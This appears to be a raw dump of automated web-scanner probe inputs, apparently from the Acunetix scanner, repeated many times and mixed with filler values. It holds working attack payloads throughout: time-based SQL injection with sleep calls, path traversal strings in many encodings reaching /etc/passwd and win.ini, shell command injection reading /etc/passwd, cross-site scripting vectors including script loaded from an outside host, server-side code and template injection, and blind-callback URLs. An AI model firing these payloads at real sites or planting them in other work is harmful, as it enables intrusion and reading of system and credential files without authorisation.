(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(982369)>

-1

1

../../../../../../../../../../etc/passwd.jpg

1

${99274+100465}

1

1

`cat /etc/passwd`

1

-1)

1<img/src=">" onerror=alert(943620)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1

'|'ld

-1))

1<ScRiPt%20>prompt(990146)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n999029=v910792

)

1some_inexistent_file_with_long_name%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

c4v4W4fw'

"|"ld

!(()&&!|*|*|

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Kh6knCcw')

\xf6<img acu onmouseover=prompt(945948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

1

'"()

'

/etc/passwd

testasp.vulnweb.com

1

'

1<input autofocus onfocus=prompt(983601)>

GVMDPdis'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitnfUNTwXl1N.bxss.me/

&dir

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_oNR3w <ScRiPt >prompt(920730)</ScRiPt>

1

acunetix_wvs_invalid_filename

1

z5ru2fJ1'

'&dir&'

1

file:///etc/passwd

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

cNS7bRVx')

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

comments

wfLYe6e8'))

1

1

http://www.acunetix.tst

1

'"

|dir

1

comments/.

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(963550)</ScRiPt>

<!--

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(997305)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

"|dir

1

1_987968

1

1

../../../../../../../../../../windows/win.ini

1

acu10467\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10467

1

1

../../../../../../../../../../boot.ini

1

1

acux7638\xc0\xbez1\xc0\xbcz2a\x90bcxuca7638

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(916926)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(966299)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(984015)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900952></ScRiPt>

1

1

1

1<ScRiPt >prompt(911993)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(961991)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932717)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(910458))>

1

1<iframe src='data:text/html

1

response.write(9288249*9228037)

1

1

1

WEB-INF/web.xml

1<body onload=prompt(960850)>

1

'+response.write(9288249*9228037)+'

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961428)>

1

1

1

&cat /etc/passwd&

"+response.write(9288249*9228037)+"

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(932770)>

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

'&cat /etc/passwd&'

1

1

1<img/src=">" onerror=alert(956624)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt%20>prompt(919806)</sCripT>

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1&lt

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

-1)

cat /etc/passwd

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

\xf6<img acu onmouseover=prompt(914493) //\xf6>

${100167+100492}

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<input autofocus onfocus=prompt(951033)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n985020=v913483

|cat /etc/passwd#

2l52HzoE'

1

1

1

1some_inexistent_file_with_long_name%00.jpg

<a href='http://www.acunetix.com'>website security</a>

)

TglAZfKF')

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

kP3cG0qH'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

-1

'

testasp.vulnweb.com

1_qvR4w <ScRiPt >prompt(908303)</ScRiPt>

/etc/passwd

1

1

1

1

"

-1)

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

AzvJR0tZ'

acunetix_wvs_invalid_filename

||cat /etc/passwd

http://hitmGhDBWYjcp.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

F0uDT1HB')

1

1

comments

1

1

1

1

&dir

OTDVspaF'))

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

'&dir&'

1

1

'"

1

1'"()&%<ScRiPt >prompt(989813)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

comments/.

"&dir&"

WEB-INF/web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(907333)</ScRiPt>

|dir

1

1

WEB-INF\web.xml

1

1_945302

1

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

acu3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3917

1

"|dir

../../../../../../../../../../boot.ini

acux4456\xc0\xbez1\xc0\xbcz2a\x90bcxuca4456

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(965408)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(918500)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(959573)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973803></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(900385)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(949990)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952145)"></g></svg>

response.write(9449221*9888493)

1

1<div style=width:expression(prompt(967653))>

1

1

1

WEB-INF/web.xml

'+response.write(9449221*9888493)+'

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(915639)>

"+response.write(9449221*9888493)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979308)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(970072)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img/src=">" onerror=alert(919011)>

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

1

1<ScRiPt%20>prompt(986000)</sCripT>

1

1

`cat /etc/passwd`

${99290+99498}

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

|cat /etc/passwd#

1&lt

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1YLa50iV'

1

\xf6<img acu onmouseover=prompt(987950) //\xf6>

'|'ld

1

1&n999654=v908929

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

syV64ZIq')

1

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<input autofocus onfocus=prompt(915899)>

testasp.vulnweb.com

1

"|"ld

HwRM96sI'))

<a href='http://www.acunetix.com'>website security</a>

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

'"()

1

[url=http://www.acunetix.com]website security[/url]

1

^(#$!@#$)(()))******

/etc/passwd

1

-1)

1_9VUrx <ScRiPt >prompt(979472)</ScRiPt>

'

1

1

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

"

"

1

1

1

||cat /etc/passwd

LiBs0dsZ'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

http://hit3I9bm1Daja.bxss.me/

1

&dir

k3iX4EFC')

1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

wVXImCVN'))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

1

comments

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(907052)</ScRiPt>

1

1

comments

1

<!--

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(978161)</ScRiPt>

|dir

1

1

1

1

comments/.

WEB-INF\web.xml

1

1

'|dir

1_913920

1

../../../../../../../../../../windows/win.ini

1

1

1

acu4694\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4694

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4676\xc0\xbez1\xc0\xbcz2a\x90bcxuca4676

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(993767)</ScRiPt>

1

1

1

1

1

................windowswin.ini

1<script>prompt(901763)</script>

1

1

1

1<ScRiPt >prompt(943837)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975572></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(950550)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986685)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925485)"></g></svg>

1

1

1<div style=width:expression(prompt(908754))>

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1

1

1

1

1<body onload=prompt(965822)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982383)>

1

1

1

1<img src=xyz OnErRor=prompt(940521)>

1

1

1<img/src=">" onerror=alert(966170)>

1

1<ScRiPt%20>prompt(973039)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(953251) //\xf6>

1

1

1<input autofocus onfocus=prompt(912593)>

1

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_WnUHE <ScRiPt >prompt(960326)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9616504*9152144)

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9616504*9152144)+'

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9616504*9152144)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

-1

1

-1)

1

${99140+100186}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n972198=v977119

|cat /etc/passwd#

1

-1))

)

1

1some_inexistent_file_with_long_name%00.jpg

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

0WgY2SR7'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

'

testasp.vulnweb.com

K6NrmKv8')

^(#$!@#$)(()))******

1

"

/etc/passwd

1

1

1

02eYKLUE'))

1

'

http://hitj3sGN8X0PH.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

"

1

-1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

-1)

1

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

'"

1

tZG2OgLA'

comments/.

'&dir&'

1

1'"()&%<ScRiPt >prompt(922950)</ScRiPt>

K2VS25Og')

1

<!--

file:///etc/passwd

'"()&%<ScRiPt >prompt(956929)</ScRiPt>

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

1

TP0VzBwJ'))

1

|dir

1_910342

WEB-INF/web.xml

1

1

1

1

acu5837\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5837

WEB-INF\web.xml

'|dir

1

1

"|dir

../../../../../../../../../../windows/win.ini

acux2356\xc0\xbez1\xc0\xbcz2a\x90bcxuca2356

1

1

1

1<ScRiPt >prompt(989370)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(997295)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(959991)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(948050)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(966979)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966336)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9619770*9147549)

1<div style=width:expression(prompt(976001))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9619770*9147549)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9619770*9147549)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<body onload=prompt(996828)>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965262)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

-1

1

1<img src=xyz OnErRor=prompt(908638)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

${99134+100499}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(948281)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1))

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(964002)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

vsUnR41m'

1&n961941=v920259

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

1

testasp.vulnweb.com

"|"ld

OGM61qIi')

)

\xf6<img acu onmouseover=prompt(980628) //\xf6>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

3TWekHaY'))

1

'"()

1<input autofocus onfocus=prompt(918680)>

'

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

'

"

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

"

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1_DfwvQ <ScRiPt >prompt(978037)</ScRiPt>

1

http://hitt3W3oukI5k.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

vlQiJ2my'

1

1

1

1

1

'&dir&'

http://www.acunetix.tst

1

1

Pja3LFrm')

comments

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(904713)</ScRiPt>

'"

"&dir&"

1

k6wMT8CX'))

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(957674)</ScRiPt>

WEB-INF/web.xml

1

1

1

1_929590

'|dir

1

1

1

1

WEB-INF\web.xml

1

1

acu3722\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3722

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6547\xc0\xbez1\xc0\xbcz2a\x90bcxuca6547

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(920741)</ScRiPt>

1

1

1

1<script>prompt(996207)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(907642)</ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?963548></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(938945)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(919586)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9597697*9151146)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915571)"></g></svg>

1

'+response.write(9597697*9151146)+'

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(970834))>

1

1

'&cat /etc/passwd&'

1

"+response.write(9597697*9151146)+"

1<iframe src='data:text/html

WEB-INF/web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

WEB-INF\web.xml

1<body onload=prompt(991021)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927352)>

1

cat /etc/passwd

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(987729)>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

-1)

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(922758)>

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${99576+100219}

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n990252=v962426

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt%20>prompt(928282)</sCripT>

1

awfzGyzZ'

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

N1sPNx75')

)

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(943900) //\xf6>

!(()&&!|*|*|

hT7jjNxm'))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<input autofocus onfocus=prompt(910567)>

'"()

/etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

testasp.vulnweb.com

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

-1)

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1_Se0xV <ScRiPt >prompt(954703)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

http://hit2KNRUGwagq.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

M2VNzVt0'

1

1

1

1

comments

1

U3zdj5gA')

&dir

1

comments

1

file:///etc/passwd

1

1

1

1

'&dir&'

5i6zMjk1'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(923939)</ScRiPt>

1

1

1

1

|dir

1

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(998422)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1_983265

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

acu7856\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7856

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5468\xc0\xbez1\xc0\xbcz2a\x90bcxuca5468

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(907390)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(992293)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992783)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994488></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(945572)</ScRiPt>

response.write(9674573*9358797)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9674573*9358797)+'

1<video><source onerror="javascript:prompt(950211)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

&cat /etc/passwd&

"+response.write(9674573*9358797)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910163)"></g></svg>

